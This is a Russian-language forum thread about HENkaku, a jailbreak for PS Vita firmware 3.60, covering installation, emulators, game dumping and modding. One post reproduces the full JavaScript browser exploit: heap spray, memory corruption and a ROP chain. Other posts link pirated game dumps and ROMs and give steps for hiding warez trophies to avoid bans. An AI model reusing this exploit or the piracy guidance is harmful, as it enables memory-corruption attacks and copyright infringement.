PDA

Просмотр полной версии : [3.60] HENkaku - Homebrew ENabler для PS Vita и PSTV


Страницы : [1] 2 3

Zuriy
29.07.2016, 13:10
http://i.imgur.com/aYh7nQe.png

Первоисточник - https://henkaku.xyz/
Исходники - https://github.com/henkaku/henkaku/releases

Что такое HENkaku? 11383
HENkaku - это первый HEN (Homebrew ENabler) для PS Vita и PSTV.
Это типа джейлбрейка для iPhone или root для Android устройств.
Homebrew - это игры и приложения, созданные сторонними разработчиками и не утверждены, не подписаны официально. Например, VitaDoom (https://github.com/xyzz/Vita_Doom/releases/latest) является портом классической игры DOOM и mGBA (https://mgba.io/) позволяет играть ромы от Game Boy Advance. Вы можете найти больше примеров в нашей витрине showcase (https://henkaku.xyz/showcase/).

Самая хорошая новость для всех, что HENkaku распространяется 100% бесплатно, без рекламы, без пожертвований.

Как я могу получить его?
Посетите сайт https://henkaku.xyz (https://henkaku.xyz) со встроенного веб-браузера PS Vita и нажмите кнопку "Install" для установки HENkaku. Вы должны делать это каждый раз при перезагрузке консоли, то есть, каждый раз, когда вы выключаете консоль и включаете её снова.

Что для этого требуется?
Вам нужна консоль PS Vita или PSTV с прошивкой 3.60. К сожалению, не представляется возможным запустить HENkaku на более новой версии прошивки, а также, не представляется возможным понизить прошивку системы, если вы обновите её на более старшую версию.

Кроме того, нужна карта памяти любого размера, по меньшей мере, 10 МБ свободного пространства. Внутренняя память в настоящее время не поддерживается. Чтобы перевести homebrew на устройство, вам также понадобится клиент FTP для вашего компьютера. Мы рекомендуем FileZilla (https://sourceforge.net/projects/filezilla/). И, наконец, необходимо подключение к Интернету, чтобы установить HENkaku.

PS Vita с прошивкой 3.60
Интернет-соединение
FTP-клиент на компьютере
Карта памяти

Важно, чтобы вы никогда не обновляли Vita мимо 3,60, если вы хотите использовать HENkaku сейчас или в будущем. Если вы сделаете обновление, все установленные homebrew больше не будут работать и вы не сможете установить любое homebrew в будущем.

Способы оффлайн установки:

HENkaku Offline Installer (http://www.pspx.ru/forum/showthread.php?t=106285)
HENkaku Android - Локальный веб-сервер на Android для установки HENkaku на PS Vita (http://www.pspx.ru/forum/showthread.php?t=106306)

Derrik_Gotu
29.07.2016, 13:32
инструкция по установке -> http://signedisos.narod.ru/forum/24-45-1

Установили кто-то уже анч вроде, который слитый с sdk
https://pbs.twimg.com/media/Cohlf7PVIAEbwvB.jpg

capricorn_034
29.07.2016, 13:58
эмм Кажись Полноценная победа !
не полноценная еще... Здесь (http://hackinformer.com/2016/07/28/henkaku-first-vita-homebrew-enabler/) написано:
"Он (HEN) не даёт вам возможности ставить и запускать бэкапы или какой-либо пиратский контент.Он не отключает функции DRM. Он не позволяет вам декриптовать игры."
It does not let you install or run Vita “backups”, warez, or any pirated content. It does not disable any DRM features. It does not let you decrypt encrypted games.

COOLERbyPSP
30.07.2016, 00:16
Эмм. А vHBL теперь можно поставить же? Игры от PSP запускать?
А ещё интересует подмена списка совместимости PS TV (Vita TV)

Ок, про список сам нашел)
http://wololo.net/2016/07/29/re-enable-pstv-whitelist-3-60-ps-vita-henkaku/

erutan
30.07.2016, 01:07
Эмм. А vHBL теперь можно поставить же? Игры от PSP запускать?
А ещё интересует подмена списка совместимости PS TV (Vita TV)

wololo про vhbl на 3.60 (http://wololo.net/2016/07/29/tutorial-installing-vhbl-custom-bubble-via-henkaku-firmware-3-60/)

>> Gotcha, makes sense…what about psp iso’s?
>>>>Wont work either, because PSP ISOs (and PS1 games) will require kernel mode access as well.

COOLERbyPSP
30.07.2016, 02:02
Чёт залил я список (41 байт?), а "несовместимая" игра всё равно ругается. Страаанно...
PlayStation All-Stars Battle Royale запускаю, если что.

Оу, я что-то упустил, надо ur0:shell/db/app.db ковырять :0

Поковырял, залил обратно, ничего не изменилось :lol:


Vita Cartridges are working great! The only problem comes from digital downloads now. For instance, Neptunia 1 and Tetris are not working. Any ideas on what it would take to get those off the white list, or are digital downloads hard coded to not work maybe?
Может поковырять какой-нибудь param.sfo? :0
О, можно картриджи дампить, в файлзилле вручную путь /gro0: прописать =)

Пробую сдампить первую Диву с яп карика (PCSG00074) :drinks:

Кстати, .rif прямо на карике, это нормально вообще?
Сдампил файлы и...ничего не могу открыть :lol: Видимо, усё зашифровано (ожидаемо, не правда ли?). Если надо кому - залью на облако архив (2.67Гб)

COOLERbyPSP
30.07.2016, 10:10
Ждём RetroArch
Будет забавно, если кто-то портанёт PPSSPP :lol:
http://i.imgur.com/aHsKeYV.png

wl@d
30.07.2016, 14:05
Надо ещё подождать что бы игры прлноценно запускать от виты,псп?у самого виты нет,чисто интересно что получится...

Izotov
30.07.2016, 16:39
COOLERbyPSP, с железом виты это фантастика. А про все остальное просто надо все эмули перекомпилировать. Они под rejuvenate
http://buildbot.libretro.com/nightly/playstation/vita/

13thAngel
31.07.2016, 17:58
А что насчёт слим-версии консоли? Её можно будет ломануть данной прогой?

COOLERbyPSP
31.07.2016, 18:48
А что насчёт слим-версии консоли?
Пофиг, у меня, вон, вообще без экрана :D

Derrik_Gotu
31.07.2016, 19:21
файлы эксплоита -> https://cloud.mail.ru/public/LoZE/68TswYdwg

COOLERbyPSP
31.07.2016, 21:29
И бОльшую часть архива занимает картинка, которая без почти_не_видимого_градиента могла бы весить ~3Кб вместо 159 :lol:

http://puu.sh/ql29c/0fcb4e7da0.png

COOLERbyPSP
01.08.2016, 00:23
Список (http://wololo.net/talk/viewtopic.php?f=116&t=46136) всех (?) хоумбрю на данный момент =)
А вот эта (http://wololo.net/2016/07/31/ps-vita-3-60-hack-mr-gas-showcases-decrypted-vita-game-savedata/) новость ещё интереснее :crazy:

Zuriy
01.08.2016, 15:42
Список (http://wololo.net/talk/viewtopic.php?f=116&t=46136) всех (?) хоумбрю на данный момент =)
А вот эта (http://wololo.net/2016/07/31/ps-vita-3-60-hack-mr-gas-showcases-decrypted-vita-game-savedata/) новость ещё интереснее :crazy:
Воу Воу ! Это уже прогресс какой то
если у них получилось, может этим алгоритмом можно дешифровать больше игр ?
осталось научиться их запускать расшифрованными и дрм оббходить

COOLERbyPSP
01.08.2016, 23:27
:lol:
http://i80.fastpic.ru/big/2016/0802/2a/30b2c008b671dc124bc36d6c55ce302a.png

erutan
02.08.2016, 01:50
http://wololo.net/2016/08/01/majortom-rickrolls-us-confirms-vita-games-modding-now-possible/

Теперь возможен моддинг игр (но дрм не обошли, так что модифицировать игру можно только если она у тебя есть).
Потенциально открывает возможность как к модам как таковым, так и к неофициальным переводам (jap > eng , eng > rus и тд)

riku.kh3
03.08.2016, 07:52
Чёт не хочется из-за каких-то там кривых, сделанных одним кликом, портов эмуляторов рисковать баном как PSN-аккаунта со всеми купленными на нём играми, так и баном самой железки.

Ничего принципиально нового, насколько я понял, нет. Все это давно было доступно на ранних FW. Чтобы пиратить надо декриптовать eboot со всеми модулями, не факт что данный хак технически на это способен.

acidant
03.08.2016, 09:09
Ну баню уже можно обойти лесом... http://wololo.net/2016/08/03/molecularshell-disguiser-way-protect-prying-eyes/

riku.kh3
03.08.2016, 10:29
Ну-ну. Там гораздо больше в бэкграунде всего происходит и отправляется на серверы, чем в этом списке для хомячков. Риск остается. Делали так уже на PS3.

Vlad510
04.08.2016, 09:19
Я полностью поддерживаю:riku.kh3!!Поэтому смысл в этих хомках??Т.к лучше-бы реально Виту ломанули-бы чем заниматься запуском хомок ,на Вите!!Т.к ведь в хомки даже ,на ПС3 любой взломанной для пираток можно сыграть!Т.к ведь Вита уже пылится без взлома 6й год у хакеров:(:(:(!

Vlad510 добавил 04.08.2016 в 09:19
Пожалуйстааа,не молчите ,на мой вопросик!

acidant
04.08.2016, 13:00
Vlad510 так можно и про авто говорить, нафига вы им колеса прикручиваете, дела ли бы сразу парящими над землей.
Данный хак позволяет в режиме ридонли пощупать кишки системы. дальше-больше. вон sega saturn спустя 20 лет ломанули, 6 лет - ни о чем))

doubledeath
04.08.2016, 15:59
Так если отвязать виту от учётки, и сбросить к заводским настройкам, а потом банально не указывать свои учётные данные в консоли... то никто никого не забанит, разве нет?

COOLERbyPSP
04.08.2016, 22:29
По эмуляторам SNES:
catsfc_plus_libretro намного быстрее Snes9xVITA.
У последнего просадки в Зельде 10-15фпс иногда. И почти всегда лагающий звук. На первом проблем не вижу от слова вообще.
Ещё б XMB завезти в RetroArch для Виты "из коробки"

akela1979
05.08.2016, 01:51
http://pastebin.com/bYA4xGaQ
The reconstructed payload can be find here: payload.bin (https://www.sendspace.com/file/mwpeut) (2.85 KB)

And an analysis of the payload's binary data can be found here: http://pastebin.com/gxc0cX1i
<****** src='payload.js'></******>

<******>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;

var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */

var _dview = null;

/*
Wrap two uint32s into double precision
*/
function u2d(low, hi)
{
if (!_dview)
_dview = new DataView(new ArrayBuffer(16));

_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0)
}

/*
Unwrap uints from double
*/
function d2u(d)
{
if (!_dview)
_dview = new DataView(new ArrayBuffer(16));

_dview.setFloat64(0, d);
return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
}

// Temporary space to store Element object
var aspace_temp = new Uint32Array(1024);

var word1 = 0;
var word2 = 0;

function swap(offset)
{
word1 = aspace32[offset/4];
word2 = aspace32[offset/4 + 1];
return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
}

r = 0x4000;
textareas = new Array(r);
aspace_arr = new Array(r);
t = 0x1344;
n = 0x66656463;
o = 0x55555555;


for (var i = 0; i < aspace_arr.length; ++i)
{
aspace_arr[i] = new Uint32Array(0x1344/4);
var e = document.createElement("textarea");
e.rows = 0x66656463;
textareas[i] = e;
}

/*
Spray memory with Element objects
*/
for (var i = 0; i < 1024; ++i)
{
var e = document.createElement("textarea");
e.rows = 0x66656463;
textareas.push(e);
}

var N = 0x3000;
var W = Array.prototype.constructor.apply(null,new Array(0x3000));
var j = 2048;
var q = new Array(2048);
var z = {};

var C = new Array(256);

z.toString = function()
{
W.push(12345);

for (var r = 0; r < C.length; ++r)
{
var a = Array.prototype.constructor.apply(null, q);
a[0] = 0;
a[1] = 1;
a[2] = 2;
C[r] = a;
} return""
};

W[0] = z;
var G = u2d(0x80000000, 0x80000000);

for (var i = 1; i < 8192; ++i)
W[i] = G;

W.sort();
contents = "";
cur = 0;

z.toString = function(){};

var I = null;

for (var i = 0; i < C.length; ++i)
{
if(C[i].length != j)
{
I = C[i];
break;
}
}

var count = 0x20000000 - 0x11000;

for(; ; count--)
{
if(I[count] != 0)
{
_dview.setFloat64(0, I[J]);

if (_dview.getUint32(0) == t/4)
{
_dview.setUint32(0, 0xEFFFFFE0);

I[J] = _dview.getFloat64(0);
_dview.setFloat64(0, I[J - 2]);

v = _dview.getUint32(4);
_dview.setUint32(4, 0);
_dview.setUint32(0, 0x80000000);

I[J-2] = _dview.getFloat64(0);

break;
}
}
}

target_aspace = null;

for (var i = 0; i < aspace_arr.length; ++i)
{
if(aspace_arr[i].byteLength != t)
{
target_aspace = aspace_arr[i];
break;
}
}

if (!target_aspace)
{
alert("failed");
while(1){};
}

var aspace32 = target_aspace;
var fkvtable = v;
f = v;

/*
Find one of the sprayed Element objects in memory
by looking for the rows of the object
*/

for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
{
if (aspace32[addr] == 0x66656463)
{
aspace32[addr] = 0x55555555;
textarea_addr = addr * 4;
found_element = true;
break;
}
}

if (!found_element)
{
alert("Did not find Element signature");
while(1){};
}

/*
Change the rows of the Element object then scan the array of
sprayed objects to find an object whose rows have been changed
*/

var found_corrupted = false;
var corrupted_textarea;

for (var i = 0; i < textareas.length; ++i)
{
if(textareas[i].rows == 0x55555555)
{
corrupted_textarea = textareas[i];
found_corrupted = true;
break;
}
}

if (!found_corrupted)
{
alert("Did not find corrupted textarea");
while(1){};
}

var vtidx = textarea_addr - 0x70;
var textareavptr = aspace32[vtidx/4];
scewkbase = textareavptr - 0xABB65C;
scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
p = swap(scewkbase + 0x85D2E4) - 0x22D65;
d = swap(p + 0x2C688C) - 0x9E5;
g = swap(d + 0x3BC4) - 0xDC2D;
scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
k = swap(g + 0x18BF4) - 0xD59;
b = swap(k + 0x9AB8) - 0x49CD;

// Copy vtable
for (var i = 0; i < 64; i++)
aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];

aspace32[vtidx/4] = fkvtable;

// Save Element object
for (var i = 0; i < 0x30; ++i)
aspace_temp[i] = aspace32[vtidx/4 + i];

// Call setjmp
aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;

// Undefine scrollLeft
corrupted_textarea.scrollLeft = 0;

// Save payload address (jmp context)
payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
payload_addr -= 0xEF818;

// Restore Element object
for (var i = 0; i < 0x30; ++i)
aspace32[vtidx/4 + i] = aspace_temp[i];

payload_stack = payload_addr + 0x40;
payload_code = payload_addr + 0x10000;
payload_off = payload_addr/4;

// Build ROP payload
for (var i = 0; i < payload.length; ++i,++payload_off)
{
// Reached the end of ROP header (first 0x770 bytes)
if (i == 476)
payload_off = payload_code/4;

switch(relocs[i])
{
case 0:
aspace32[payload_off] = payload[i];
break;
case 1:
aspace32[payload_off] = payload[i] + payload_stack;
break;
case 2:
aspace32[payload_off] = payload[i] + scewkbase;
break;
case 3:
aspace32[payload_off] = payload[i] + scekernbase;
break;
case 4:
aspace32[payload_off] = payload[i] + scelibcbase;
break;
case 5:
aspace32[payload_off] = payload[i] + g;
break;
case 6:
aspace32[payload_off] = payload[i] + scenetbase;
break;
case 7:
aspace32[payload_off] = payload[i] + b;
break;
default:
alert("wtf?");
alert(i + " " + relocs[i])
}
}

// Trigger ROPchain
aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */

var rchainaddr = fkvtable + 0x100;

aspace32[rchainaddr/4 + 5] = payload_code;
aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;

alert("Welcome to HENkaku!");

// Set scrollLeft to ROP chain
corrupted_textarea.scrollLeft = rchainaddr;

alert("that's it");
</******>

COOLERbyPSP
05.08.2016, 17:29
Эмулятор NDS теперь умеет выбирать ромы и поддерживает JIT
https://github.com/masterfeizz/DeSmuME-Vita/releases

Mishanstvo
08.08.2016, 18:26
http://www.mediafire.com/download/75d5bpdigc18b16/Adventure+TIme+-+Very+first+vita+backup.vpk
Adventure time psvita, never released game (dumped from devkit)
Install from Vitashell 0.7

trophies work, enjoy the ban

-- hf

riku.kh3
08.08.2016, 20:54
http://www.mediafire.com/download/75d5bpdigc18b16/Adventure+TIme+-+Very+first+vita+backup.vpk
Adventure time psvita, never released game (dumped from devkit)
Install from Vitashell 0.7

trophies work, enjoy the ban

-- hf
Ну вот, EBOOT и PRX-модули в незакриптованном FSELF формате. То, что доктор прописал.
Может мотивирует кого-нибудь покопать в сторону декриптовки подписанного контента.

SILENT-Pavel
09.08.2016, 03:49
инструкция по установке -> http://signedisos.narod.ru/forum/24-45-1

Установили кто-то уже анч вроде, который слитый с sdk
https://pbs.twimg.com/media/Cohlf7PVIAEbwvB.jpgИ как работает или только висит плейсхолдером и черноэкранит?

riku.kh3
10.08.2016, 19:54
Попробовал пересобрать ваш "uncharted" под HENkaku, проверьте :P
http://rgho.st/6ghyyV7Vr

vampula
11.08.2016, 16:34
Доступны инструменты для устоновки henkaku в оффлайне с виты. И по взлому: Henkaku команда говорила, что отдаст исходники раскодировавшим полностью их эксплоит. Как они утверждают, на эту раскодировку уйдет минимум несколько месяцев. И это только раскодировка, про взлом drm вообще наверно забыть можно на несколько лет. Кароче, ставим все 3.60 с оффлайн хенкаку и кладём виту еще на неопределённый срок на полку.

lupus
11.08.2016, 18:00
riku.kh3, отличный анч на 2 метра 🙃

Сдампил и разобрал картриджную версию Gravity Rush, теперь бы попробовать собрать назад и подсунуть в виде патча. Если заведётся - можно разбирать формат хранения текста и переводить на русский...

Mishanstvo
11.08.2016, 19:11
lupus, очень жду перевода) на 4pda есть ветка с уже готовым переводом.

Cepera
11.08.2016, 23:46
В этом HENkaku спрятан ядреный эксплойт чтоль?

Cepera добавил 11.08.2016 в 23:46
Время приключений работает, анчартед - нет, ошибка C1-2613-2

vampula
12.08.2016, 01:02
Cepera, станет понятно после полного разбора кода. По слухам - да, возможно таки карнел.

Mishanstvo
12.08.2016, 09:39
vampula, а можно ссылку где ведутся эти работы?

vampula
12.08.2016, 11:48
Mishanstvo, вот ссылка на личный сайт разраба henkaku: http://yifan.lu/2016/08/05/henkaku-koth-challenge/ (заходить через анонимайзер), в комментах к статье последней есть посты декодеров с их прогрессами.
Также можно следить за твиттером разраба: https://mobile.twitter.com/yifanlu?p=i

lupus
12.08.2016, 11:59
Пошаговый мануал по удалению трофеев игры Adventure Time во избежание бана за установку вареза.
1. Запускаем molecularshell или vitashell 0.7
2. Удаляем с консоли следующие папки:
ur0:user/00/trophy/conf/NPWR07969_00
ur0:user/00/trophy/data/NPWR07969_00
ur0:user/00/trophy/data/sce_trop
3. Выходим в livearea и запускаем системное приложение "Призы"
4. Видим сообщение о восстановлении информации о трофеях и ждём окончания процесса
5. Все трофеи, за исключение полученных в Adventure Time будут восстановлены.

Надо бы написать автору History deleter'а, чтобы добавил данную опцию в софтинку или самому попробовать поковырять его сырцы.

Mishanstvo
12.08.2016, 16:44
А почему только 333 и 444 Мгц? Почему нельзя работать на других частотах? Если будет полный взлом, будет доступ ко всему процессору?

COOLERbyPSP
12.08.2016, 22:54
Если будет полный взлом, будет доступ ко всему процессору?
Вполне возможно. Особо радоваться, впрочем, тоже не стоит, ибо это грозит повышением энергопотребления и тепловыделения.
Ладно ещё PS TV можно разобрать и радиатор поставить, а вот с обычной версией, скорее всего, ничего не сделать.

Mishanstvo
13.08.2016, 01:34
Вполне возможно. Особо радоваться, впрочем, тоже не стоит, ибо это грозит повышением энергопотребления и тепловыделения.
Ладно ещё PS TV можно разобрать и радиатор поставить, а вот с обычной версией, скорее всего, ничего не сделать.

Так всякие килзоны,анчартеды и прочие используют все ресурсы приставки, а не 444 Мгц и она ни капли не греется! Процессор витки расчитан до 2-х Ггц!

riku.kh3
13.08.2016, 03:39
Если бы ссаные анчартеды использовали бОльшую частоту, то это бы сказалось на времени работы от батарейки, чего не наблюдается. И вообще, у Сони свои кастомные чипы, мало кто знает на что они там рассчитаны.

vampula
13.08.2016, 05:40
riku.kh3, так ведь arm cortex a9, нет?

riku.kh3
13.08.2016, 10:11
Sony CXD5315GG. Он базируется на Cortex-A9, но никак не обязан его стандартным спецификациям соответствовать. То есть вполне может быть урезанным.

Mishanstvo
13.08.2016, 11:01
Sony CXD5315GG. Он базируется на Cortex-A9, но никак не обязан его стандартным спецификациям соответствовать. То есть вполне может быть урезанным.

Да даже если и урезан, то ни как не до 444 Мгц! Думаю там 1 Ггц минимум.

lupus
13.08.2016, 11:36
Получилось пересобрать контейнер из Gravity Rush и запустить, подсунув в виде патча, пока без изменений файлов. Сам контейнер отличается от исходного размером.
Сейчас заливаю на виту очередную сборку, где хекс редактором изменил пару строк в лангпаке. Посмотрим, что из этого получится.

SILENT-Pavel
13.08.2016, 14:34
Получилось пересобрать контейнер из Gravity RushТам же вроде полностью стандартный псарк? Как на пс3 игр вроде мотошторм? Можешь сдампить демо игры из ПСН? Там говорят дебаг функции могут быть: http://jul.rustedlogic.net/thread.php?id=15739

lupus
13.08.2016, 18:32
Да, псарк, я разбирал и собирал его с помощью плагина к тотал коммандеру.
Собрать псарк идентичный оригинальному не получилось, но после многократных мытарств игра запустилась. Не могу разобраться, почему она не подхватывает изменения, внесённые в текст пересобранного контейнера, а изменённый для тестирования мануал грузит на ура.
Если есть желающие помочь в этом разобраться, готов поделиться декриптованным дампом, он под полтора гига весит.
Кроме того, не откажусь от помощи с разбором лангпаков и софтом для работы с ними.

Что касается демок, если есть откуда скачать drm-free, то могу попробовать их декриптовать. Доступ в псн для 3.60 уже прикрыли, а пс3 у меня нет, поэтому из псн я поставить уже ничего не смогу :/

SILENT-Pavel
14.08.2016, 01:08
Не могу разобраться, почему она не подхватывает изменения, внесённые в текст пересобранного контейнераУ игры может быть недокументированный кэш где-то в другом месте. Например если вставить карик в виту она установит вроде бы 200 или 400 мегабайт чего-то помимо сохранений а внутрь этого кэша уже сами сохранения вшиваются позже. Ну это лишь догадка, тут речь идет про цифровую версию?из псн я поставить уже ничего не смогу :/прокси трик не работает? с доступом в псн когда прошивка на одну ниже актуальной.

lupus
14.08.2016, 04:57
SILENT-Pavel, кэш, может и есть, но патч должен его крыть...

akela1979
14.08.2016, 13:17
Скачать: https://mega.nz/#F!0A9QATgI!miAGeMvLeth0wUmSs1dusQ

https://pp.vk.me/c626624/v626624860/24243/YCkiDc6TVJU.jpghttps://pp.vk.me/c626624/v626624860/24282/KNdRcmfl1kE.jpghttps://pp.vk.me/c626624/v626624860/24231/z8u5GtVFfFA.jpghttps://pp.vk.me/c626624/v626624860/2423a/nzO71uavZOc.jpghttps://pp.vk.me/c626624/v626624860/2424c/X17DfKCBfKQ.jpg

8gJECNGROCk jFrRJdCi5js

akela1979
14.08.2016, 22:35
обалдеть, мой семилетний сын прям щас играет Metal Slug 3 (http://www.emuparadise.me/Neo_Geo_ROMs/Metal_Slug_3/119673) через RetroArch (http://buildbot.libretro.com/nightly/playstation/vita/) :clapping::game:


Install new "fbalpha2012_neogeo_libretro.vpk"
Detele all "psp2core-xxxxxxxxx-0xxxxxxxxxx-eboot.bin.psp2dmp.tmp in "data folder"
Delete "retroarch.cfg" on "data/retroarch"
Put neogeo.zip (http://www.pspx.ru/forum/attachment.php?attachmentid=11389) (BIOS) in the same directory of neogeo roms (http://www.emuparadise.me/Neo_Geo_ROMs/26)

Frolm
15.08.2016, 02:28
В nes то как?, у меня вылетает nestopia при открытии рома.
Простите за довольно тупой вопрос...

COOLERbyPSP
15.08.2016, 03:04
Frolm, а ром в нужном формате?

mrderden
15.08.2016, 15:49
COOLERbyPSP, неожиданно на вас наткнулся. Просим прислать контактные данные нам на support@pgslab.com Вы же победитель.
https://twitter.com/PGS_Lab/status/761987903220224001

Спасибо за участие
Alec Arzh
PGS Lab Team

akela1979
15.08.2016, 21:04
RECOMMENDED for SNES emulation: snes9x2005_plus_libretro.vpk (Formerly known as CatSFC+)
успешно запустил SNES эмулятор и Donkey_Kong_Country_3_-_Dixie_Kong's_Double_Trouble!_(Europe)_(En,Fr,De) (http://www.emuparadise.me/Super_Nintendo_Entertainment_System_(SNES)_ROMs/Donkey_Kong_Country_3_-_Dixie_Kong's_Double_Trouble!_(Europe)_(En,Fr,De)/33498)
http://www.emuparadise.me/Super_Nintendo_Entertainment_System_(SNES)_ROMs/5

Retroarch tips:
- For CATSFC "Super Mario All Stars" bug: go back to RetroArch menu (L+R+SELECT+START), in OPTIONS you have to enable "Swap Joypads".
- The Final Burn Alpha cores uses MAME v0.2.97.30 romset
- Some cores need bios files in order to run, that files are copyrighted and you can not ask for them here, but google is your friend ;) . Put all bios in some folder and in settings choose that folder as your bios folder.The exception is NeoGeo, it need "neogeo.zip" in your NEOGEO roms folder.
- Overlays for gambatte http://www.elotrolado.net/viewtopic.php?p=1741918819
- Overlay for Sega Genesis http://www.elotrolado.net/viewtopic.php?p=1741933935
- Overlay for GameGear http://www.elotrolado.net/viewtopic.php?p=1741931804
- RECOMMENDED for SNES emulation: snes9x2005_plus_libretro.vpk (Formerly known as CatSFC+)

http://wololo.net/talk/viewtopic.php?f=116&t=46136

Belyavin
15.08.2016, 21:59
Попробовал я Package installer, сработал на пакете из их списка. А кто-нибудь знает, в чем разница между PGKS и PKG? И почему их вообще 2 вида?

lupus
15.08.2016, 23:23
Похоже, что pkgs собранны из распакованных drm-free pkg.

akela1979
16.08.2016, 18:08
I5-7-l3ZXtw

vampula
16.08.2016, 23:30
akela1979, Ну значт с этой инструкцией и прогой можн таки пиратить игры и обмениваться?

COOLERbyPSP
17.08.2016, 00:11
vampula, и откуда Вы возьмёте DRM-Free?

Просим прислать контактные данные
Совсем забыл про гивевей, спасибо, отправил :drinks:

vampula
17.08.2016, 03:00
Здесь народ переходник мастерит для карты памяти витовской:
https://mobile.twitter.com/RichDevX

mrderden
17.08.2016, 12:10
Похоже все эмуляторы под Henkaku это просто пересборка с псп, хотелось бы получить что то заточенное именно под Виту.
Впечатления:
Эмулятор Genesis косяк с сохранением, вроде сохраняется, но загрузить сохранение невозможно
Doom нет звука, изображение не во весь экран, низкое разрешение
Quake1 в версии 1.4 есть возможность выбрать витовское разрешение, но тормоза, либо не оптимизировано либо по прежнему используются ресурсы псп.

Mishanstvo
17.08.2016, 13:11
mrderden, Прошло около 2-х недель, а вы хотите ГЕТЕА 5 с 120 фпс на виту? Все эмуляторы запускаются нативно, псп эмуль тут не при чем. Возможно скоро нормальную оптимизацию подвезут.

riku.kh3
17.08.2016, 17:18
Rejuvenate больше года назад появился вообще-то, тут все то же самое, ничего принципиально нового.

lupus
17.08.2016, 18:21
Сга, пока, в основном пересборки с него. Не уверен, что уровень хоумбрю сцены будет на высоте psp-шного. Из старушки выжали максимум.

Mishanstvo
17.08.2016, 18:37
riku.kh3, Не соглашусь с вами, Rejuvenate как-то мимо прошел, а этот хак сразу все подхватили и активно пилят хомбрю.

riku.kh3
17.08.2016, 18:48
Пересобирают то, что было под Rejuvenate, как выше lupus сказал. В основном это код исходников под Андроид, скомпилированный в пару кликов. Ни о какой оптимизации с таким подходом речи идти не может, удивительно, если такие эмуляторы вообще лучше чем на PSP у вас работают.

Mishanstvo
17.08.2016, 18:51
lupus, Надеюсь энтузиазм у разработчиков хоубмрю не угаснет, ремоут плей с пк уже хорошо, еще N64 эмуль и все будет гуд)

Mishanstvo добавил 17.08.2016 в 18:51
riku.kh3, Но посмотрите сколько новых хомок вышло на виту после этого хака, на Rejuvenate в основном только эмуляторы.

lupus
17.08.2016, 22:56
Здесь народ переходник мастерит для карты памяти витовской:
https://mobile.twitter.com/RichDevX
Помню, в своё время, люди пытались из dvd нарезать umd и впихнуть в корпус...

akela1979
17.08.2016, 23:17
https://twitter.com/SilicaAndPina/status/765789981067673600
we now have 20 demos up on package installer 2.0 :D i guess its 2.0 demos???

https://mega.nz/#F!p9dFGSKa!OG9PQby7MP7kqWjRe6BpIQ

COOLERbyPSP
17.08.2016, 23:24
О, демка Мику Х, надо графон заценить, спасибо xD

COOLERbyPSP
18.08.2016, 00:42
Чёт перестала работать хенкака, не удаляется, установка вешает браузер. При запуске просто пишет "файл повреждён".
Почистил куки и открытые вкладки - отвалилась флешка после перезагрузки :'D

Так, с этим проблема решена, а как ещё можно демки поставить? Установщик никак не хочет на Виту что-либо заливать.
Просто распаковать и залить в app не прокатит? Пробую пока так

Не, не катит. В bgdl/t чтоли закидывать?
Да, папку 00000001 закидывать прямо туда и перезагрузить консоль. :drinks:
Графон)
https://pp.vk.me/c604820/v604820754/7a7/kU1qMqtINZI.jpg

Нигде, случаем, дамп не сливали? А то можно подкинуть файлы демке. На пс3, помнится, прокатывало несколько песен добавить (пока есть пустые места в листе)
https://pp.vk.me/c604820/v604820754/7bb/jE8_KplPCRU.jpg
Ок, дамп найден, тянем :punk:
Ох щи, дамп, похоже, "PFS-removed" :cray: Даже замена аудио из демо на расшифрованное из дампа приводит к зависону =\

Skype на Vita TV вылетает с C2-12828-1

vampula
18.08.2016, 11:04
COOLERbyPSP, на кой вам этот геморрой? Оффлайн поставьте!

COOLERbyPSP
18.08.2016, 19:41
vampula, позже поставлю, лучше с дампом бы помог кто)

riku.kh3
18.08.2016, 20:53
COOLERbyPSP, ты у демки попробуй снять PFS, с ритейл играми же делают и потом нормально подсовывают декриптованные файлы.

COOLERbyPSP
18.08.2016, 22:51
riku.kh3, оно?
PSVita Digital Game/Cartridge Game/DLC/Savedata decryption (http://pastebin.com/pz9FbTet)

riku.kh3
19.08.2016, 00:05
COOLERbyPSP, в целом да, но здесь написано использовать Mail App/NPXS10072 вместо Near/NPXS10000, которого нет на VITATV:
http://s15.zetaboards.com/Amicitia/topic/8317879/2/#new

lupus
20.08.2016, 17:12
Появился софт для дампа/записи защищённых разделов нанд. Уже пытаются сдаунгрейдить эмулятор psp до версии с кернел эксплоитом...

Mishanstvo
20.08.2016, 17:26
Так слуашйте, если есть полный доступ к системе, разве нельзя сделать образ карика и подсунуть по пути "смонтировать"? Тип как в мультимане.

acidant
20.08.2016, 17:39
Сейчас могут донат на витки рефьибюшные по 99 собрать и начнут экспериментировать с нандом. Что-то уж, надеюсь, наваяют.
Старый эмуль псп просит обновиться, так что пока ничего радостного.

akela1979
20.08.2016, 19:01
кто нибудь может сказать, в чем суть данной проги? > https://github.com/ZombieWizzard/vita-activator/releases/tag/v0.1

zav1977
20.08.2016, 19:22
Суть в том, что 3.60 уже нельзя активировать через меню PSV - консоль ломится в PSN и вылезает требование обновить прошивку.
На неактивированной консоли нельзя запустить ни одно приложение с DRM.
Это приложение должно создать act.dat (файл активации) и консоль станет активированной.
P.S. Сам не пробовал.

riku.kh3
20.08.2016, 19:28
По-моему оно не создаёт act.dat, а обращается вызовом к серверам SONY, где он генерируется.

akela1979
20.08.2016, 21:58
